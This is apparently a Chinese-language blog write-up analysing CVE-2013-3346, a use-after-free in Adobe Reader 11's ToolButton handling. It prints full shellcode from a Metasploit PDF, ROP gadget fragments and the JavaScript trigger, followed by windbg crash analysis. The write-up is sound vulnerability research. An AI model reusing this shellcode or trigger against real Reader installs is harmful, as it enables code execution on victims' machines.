CVE-2013-3346-Adobe Reader ToolButton 释放重引用漏洞

发表于 |

前言

这是一个用于”Epic Turla”网络间谍攻击行动中的一个漏洞,PDF的漏洞

漏洞分析

环境

win7 sp1 32位
windbg
ida
peepdf
adobe reader 11.0.00

ftp://ftp.adobe.com/pub/adobe/reader/win/11.x/11.0.00/zh_CN/AdbeRdr11000_zh_CN.exe

安装peepdf

1
pip install peepdf

-i开启交互模式

1
peepdf -i ./msf.pdf

结果并不是很好使

我们直接复制下面 Q=开始的东西到一个文件里面

之后即可解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PPDF> js_jjdecode file jjencode.txt

var shellcode = unescape("%u00E8%u0000%u5D00%uED83%uE905%u008B%u0000%u5052%uD231%uC031%uF980%u7501%u6604%uEBAD%uAC01%u003C%u0D74%u613C%u0272%u202C%uCAC1%u010D%uEBC2%u39E3%u58DA%uC35A%u8956%uB2DA%u313C%u66C0%u028B%uD801%u508B%u0178%u52DA%u8B51%u184A%u428B%u0120%u8BD8%u0138%u53DF%u1E8B%uF787%u3151%uE8C9%uFFAE%uFFFF%u5B59%uF787%u0275%u08EB%uC083%u4904%u22E3%uDFEB%u428B%u2918%u89C8%u8BC1%u2442%uD801%u8B66%u480C%u428B%u011C%uC1D8%u02E1%uC801%u008B%uD801%u0689%u5A59%uC683%uE204%u5EAE%u31C3%u64D2%u528B%u8B30%u0C52%u528B%uB114%u8B01%u2872%u17BB%u2BCA%uE86E%uFF5A%uFFFF%u5A8B%u8B10%u7512%u31EC%uB1C9%u680E%uFA7C%u1596%uE668%u785C%u680F%u937D%uBDFA%u2068%uEA96%u6895%uBE1B%u1A09%uDA68%u7A8B%u68AE%u6CEF%uE688%u6868%u88F6%u680D%u4676%u8A8B%uCA68%u2A6A%u6895%u0B95%u1A7F%u4568%u9E3C%u6857%uBE1C%u302E%u4E68%uDFCC%u8912%uE8E6%uFF28%uFFFF%uBD8D%u040E%u0000%u0C6A%u8059%uC837%uE247%u6AFA%u686C%u746E%u6C64%uFF54%u1456%uF883%u0F00%uD484%u0001%u5600%uC931%u8941%u68C3%uFD91%u5947%uE689%uF3E8%uFFFE%u6AFF%u8901%u68E7%u2000%u0000%uE189%u406A%u0068%u1030%u5100%u006A%u6A57%uFFFF%u5916%u5E59%u835E%u00F8%u850F%u019B%u0000%u90B0%u89FC%uB9CF%u0EF5%u0000%uAAF3%uB956%u010B%u0000%uB58D%u0303%u0000%uA4F3%uFF5E%u1056%u0789%u858D%u040E%u0000%u006A%u006A%u036A%u006A%u006A%u006A%uFF50%u0C56%uF883%u0F00%u5C84%u0001%u8900%u6AC7%u6804%u1000%u0000%u0068%u0004%u6A00%uFF00%u0456%uF883%u0F00%u4084%u0001%uC700%u1440%u0125%u0703%u40C7%uAD1C%u0000%uC700%u2C40%u0020%u0000%u40C7%u0430%u0000%uC700%u3840%uBEEF%uDEAD%u006A%uE289%u006A%u6852%u0080%u0000%u6850%u0400%u0000%u6850%u23C8%u8FFF%uFF57%u0856%uDB31%u5255%uE789%u8352%u04C3%uC031%u5050%u5350%u56FF%u8334%uFFF8%uEF74%uC031%u5350%u56FF%u832C%uFFF8%uE374%u003D%u0010%u7C00%u89DC%u89C5%u31E0%u51C9%u6A50%u5704%uFF53%u3056%u3F81%u5025%u4644%uC575%uC483%u8908%u5DEF%uEF83%u6A04%u6804%u1000%u0000%u6A57%uFF00%u0456%uC931%u5150%u5754%u5350%u56FF%u5830%uF989%uD231%uFA80%u7401%u8111%uF238%u0909%u750A%u831E%u04C0%uC2FE%u8950%u57FB%u5256%u8950%u89C6%u29DA%u89FA%uF6D0%u28E2%u8006%uF336%u5A58%u405E%uE24F%u5FD1%u8158%uC8EC%u0000%u8900%u83E3%u0CEC%u5350%uC868%u0000%uFF00%u2456%u438D%u31FC%u89C9%u5308%u5051%uFF53%u2856%u43C7%u2FFC%u2063%uC720%uF843%u6D63%u2064%u8958%u31C5%u51C9%u6A51%u5102%u6851%u0000%u4000%uFF53%u0C56%uEB83%u5308%uC389%uC931%u8951%u51E0%u5750%u5355%u56FF%u531C%u56FF%u5820%u315B%u6AC0%u5300%u56FF%uFF18%u6016%u00E8%u0000%u5B00%uEB83%u8B06%u004D%u498B%u8104%u00E1%uFFF0%u66FF%u3981%u5A4D%u840F%u0093%u0000%uE981%u1000%u0000%uEDEB%u5052%uD231%uC031%uF980%u7501%u6604%uEBAD%uAC01%u003C%u0D74%u613C%u0272%u202C%uCAC1%u010D%uEBC2%u39E3%u58DA%uC35A%u8956%uB2DA%u313C%u66C0%u028B%uD801%u508B%u0178%u52DA%u8B51%u184A%u428B%u0120%u8BD8%u0138%u53DF%u1E8B%uF787%u3151%uE8C9%uFFAE%uFFFF%u5B59%uF787%u0275%u08EB%uC083%u4904%u22E3%uDFEB%u428B%u2918%u89C8%u8BC1%u2442%uD801%u8B66%u480C%u428B%u011C%uC1D8%u02E1%uC801%u008B%uD801%u0689%u5A59%uC683%uE204%u5EAE%u89C3%u89DD%u31CB%u41C9%u7468%uACC9%u894A%uE8E6%uFF88%uFFFF%u006A%uE789%u8B57%u0B85%u0001%u5000%u16FF%u835F%u00F8%u2675%u006A%uE089%u6A50%uFF04%u5E16%uF883%u7500%u8117%uC8C6%u0000%u8100%uC8C7%u0000%u8B00%u8906%uC707%u6C47%u0000%u0000%u6158%u01B8%u0001%uC200%u0004%u9494%u94E6%u8C86%uBA98%uB0A7%uC8B1");
var executable = "";
var rop9 = "";
rop9 += unescape("%u313d%u4a82");
rop9 += unescape("%ua713%u4a82");
rop9 += unescape("%u1f90%u4a80");
rop9 += unescape("%u9038%u4a84");
rop9 += unescape("%u7e7d%u4a80");
rop9 += unescape("%uffff%uffff");
......
......
......
......
省略

那我们分析js,基本也能分析出个东西,除了对喷射,主要的代码就几条

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
app.addToolButton({
        cName: "evil",
        cExec: "1",
        cEnable: "addButtonFunc();"
});    // 创建evil Button并设置回调函数addButtonFunc

addButtonFunc = function() {
        app.addToolButton({cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();"});
}  // 创建子Buton xxx,设置了回调函数removeButtonFunc

removeButtonFunc = function() {
        app.removeToolButton({cName: "evil"});   // 删除父对象,由于子对象还有父对象的引用,导致的uaf

        for (i=0;i < 10;i++)
                arr[i] = part1.concat(part2);
}

调试

我们调试看看,打开的时候最好把保护模式关掉(第一次开启的时候应该会问你),不然我也不知道行不行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
(95c.eb0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c08a8 ebx=00000001 ecx=0891fe18 edx=000011c4 esi=0891fe18 edi=00000000
eip=4a82f129 esp=0023e51c ebp=0023e540 iopl=0         nv up ei pl nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210213
4a82f129 ??              ???
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - 
0:000> kv
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
0023e518 6219e85d bb5ba807 00000001 0891fe18 0x4a82f129
0023e540 6219e0d2 00000000 0891fe18 00000000 AcroRd32!DllCanUnloadNow+0x150536
0023e564 6219f3e3 0023e5b8 6219d996 6219f409 AcroRd32!DllCanUnloadNow+0x14fdab
0023e56c 6219d996 6219f409 08706f18 bb5ba8ff AcroRd32!DllCanUnloadNow+0x1510bc
0023e5b8 6219c68c 00000000 bb5ba8af 08706f18 AcroRd32!DllCanUnloadNow+0x14f66f
0023e5e8 6219c50e 086fabb8 04d6b090 bb5bab3f AcroRd32!DllCanUnloadNow+0x14e365
0023e678 6219c206 08706f18 09729c48 0023e694 AcroRd32!DllCanUnloadNow+0x14e1e7
0023e688 6219c1a1 08706f18 0023e6c0 620f712e AcroRd32!DllCanUnloadNow+0x14dedf
0023e694 620f712e 08706f18 04d6b090 bb5bab87 AcroRd32!DllCanUnloadNow+0x14de7a
0023e6c0 6219ae0e 62b4cfb8 ffffffff 09729c30 AcroRd32!DllCanUnloadNow+0xa8e07
0023e6f0 62196d1d 00000001 0023e6c8 6219c193 AcroRd32!DllCanUnloadNow+0x14cae7
0023e714 62196bf1 000006c4 04d6b090 096ea780 AcroRd32!DllCanUnloadNow+0x1489f6
0023e72c 6219434c 04d6b090 bb5baa83 00000000 AcroRd32!DllCanUnloadNow+0x1488ca
0023e7c4 6204e440 00000000 04d6b090 00000000 AcroRd32!DllCanUnloadNow+0x146025
0023e7f0 62193a64 bb5ba55f 000006c4 086fabb8 AcroRd32!DllCanUnloadNow+0x119
0023e818 625f38ef 087dbde8 00000000 086fabb8 AcroRd32!DllCanUnloadNow+0x14573d
0023e894 625f3b7c 04e51dd0 00000001 086a2588 AcroRd32!CTJPEGRotateOptions::operator=+0xff7d3

我们看看前面调用的是什么,可以看劫持控制流的eax来源于esi

1
2
3
4
5
6
7
8
9
10
0:000> ub 6219e85d 
AcroRd32!DllCanUnloadNow+0x150518:
6219e83f 897dfc          mov     dword ptr [ebp-4],edi
6219e842 ff96d0020000    call    dword ptr [esi+2D0h]
6219e848 0fb7d8          movzx   ebx,ax
6219e84b 8b06            mov     eax,dword ptr [esi]
6219e84d 59              pop     ecx
6219e84e 8bce            mov     ecx,esi
6219e850 66899ecc020000  mov     word ptr [esi+2CCh],bx
6219e857 ff9064030000    call    dword ptr [eax+364h]

我们看看esi,这里由于堆喷已经占位了,所以是busy,这里也可以看到大小是0x370

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0:000> !heap -p -a esi
    address 0891fe18 found in
    _HEAP @ 2570000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        0891fe10 0071 0000  [00]   0891fe18    00370 - (busy)

 
0:000> dd esi
0891fe18  0c0c08a8 41414141 41414141 41414141
0891fe28  41414141 41414141 41414141 41414141
0891fe38  41414141 41414141 41414141 41414141
0891fe48  41414141 41414141 41414141 41414141
0891fe58  41414141 41414141 41414141 41414141
0891fe68  41414141 41414141 41414141 41414141
0891fe78  41414141 41414141 41414141 41414141
0891fe88  41414141 41414141 41414141 41414141

懒得找纯正的poc了,不然更能精准看到是uaf

打赏专区
paypal: https://www.paypal.me/giantbranch
假如你看不到评论,可能是你访问Disqus被墙了,请使用代理访问